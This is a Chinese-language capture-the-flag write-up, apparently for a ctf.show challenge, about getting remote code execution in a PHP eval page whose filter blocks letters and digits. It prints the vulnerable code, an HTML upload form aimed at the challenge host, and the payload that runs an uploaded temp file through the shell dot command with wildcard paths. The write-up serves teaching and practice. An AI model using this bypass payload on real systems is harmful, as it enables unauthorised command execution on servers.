无字母数字的Webshell
直接看题,边看边说
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
highlight_file(__FILE__);
if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){
die("cerror");
} if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){
die("serror");
}
eval($cmd);
}
?>
可以看见对cmd 传入的值做了过滤,不可以出现字母数字和一些特殊符号,好在字母还给留了一个 p ,哈哈哈
反引号不属于“字母”、“数字”,我们可以用它来执行系统命令
shell下可以利用(.)点来执行任意脚本
它的作用和source一样,就是用当前的shell执行一个文件中的命令。
比如,当前运行的shell是bash,则. file的意思就是用bash执行file文件中的命令。
用. file执行文件,是不需要file有x权限的。那么,如果目标服务器上有一个我们可控的文件,那不就可以利用.来执行它了吗?
这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,
默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。
linux支持使用通配符
那么/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。
大概思路有了,构造一个文件上传,POST让(.)执行webshell
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://592f5f1e-3a81-480f-8b7f-74962233dc06.challenge.ctf.show:8080/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
这里上传个空白的文件就行,这都不重要
这里解释一下抓包内容修改的意思
cmd=?><?=`.%20/???/p?p??????`;
?> 的目的是闭合前面的<?php
`` 反引号去执行系统命令
<?= 其实是<? echo 的另一种写法,但是一般不推荐这样
"#!/bin/sh" 是对shell的声明,说明你所用的是那种类型的shell及其路径所在。
#! /bin/sh 是指此脚本使用/bin/sh来解释执行,#!是特殊的表示符,其后面跟的是解释此脚本的shell的路径)
如果没有声明,则脚本将在默认的shell中执行,默认shell是由用户所在的系统定义为执行shell脚本的shell.
如果脚本被编写为在Kornshell ksh中运行,而默认运行shell脚本的为C shell csh,则脚本在执行过程中很可能失败。
更加具体详细的理解无字母数字RCE可以去看看P神的博客
我的另外一篇是另一种的构造去实现RCE,大同小异
web55(无字母RCE)
P神无字母数字webshell